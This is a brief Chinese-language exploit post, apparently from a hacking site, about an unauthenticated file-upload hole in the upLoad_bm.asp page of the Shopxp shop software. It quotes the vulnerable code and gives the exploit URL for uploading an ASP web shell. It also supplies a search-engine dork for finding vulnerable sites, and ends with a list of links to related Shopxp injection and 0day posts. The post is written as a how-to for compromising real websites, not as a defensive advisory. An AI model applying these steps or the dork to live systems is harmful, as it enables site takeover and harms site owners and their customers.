作者:lan3a
出处:lan3a.com
首先,必须要知道管理员的目录,因为上传只有后台才可以。
在upLoad_bm.asp文件里,首先没有检查来访者的身份。所以可以直接访问
代码如下:
<%
uppath=request("a")&"/" '文件上传路径
filelx=request("b") '文件上传类型 1-jpg 2-jpg&flash 3-htm
formName=request("c") '回传到上页面编辑框所在Form的Name,为空则不回传,只显示上传后的文件名
EditName=request("d") '回传到上页面编辑框的Name
if uppath="" or filelx="" then
%>
上传路径我们可以自己定义,上传类型,不填,程序就一个JS提醒一下。照样执行。
利用方法:upLoad_bm.asp?a=uploadfile
比如www.lan3a.com
利用地址为:www.lan3a.com/admin/upLoad_bm.asp?a=uploadfile
直接上传asp木马。
关键字为:inurl:newgoods.asp?action_key_order=news
只显示10条记录相关文章
shopxp html版2.0直接添加管理员漏洞 (浏览: 11049, 评论: 0)
shopxp pinglun.asp 注入漏洞 (浏览: 10918, 评论: 0)
SHOPXP网上购物系统 v8.0 (浏览: 13519, 评论: 0)
SHOPXP网上购物系统 v8.0 注入漏洞利用 (浏览: 10405, 评论: 0)
Shopxp v8.0 SQL Injection 0day (浏览: 11594, 评论: 0)
shopxp7.4 oday (未完成) (浏览: 7, 评论: 0)
shopxp pinglun.asp 注入漏洞 (浏览: 10918, 评论: 0)
SHOPXP网上购物系统 v8.0 (浏览: 13519, 评论: 0)
SHOPXP网上购物系统 v8.0 注入漏洞利用 (浏览: 10405, 评论: 0)
Shopxp v8.0 SQL Injection 0day (浏览: 11594, 评论: 0)
shopxp7.4 oday (未完成) (浏览: 7, 评论: 0)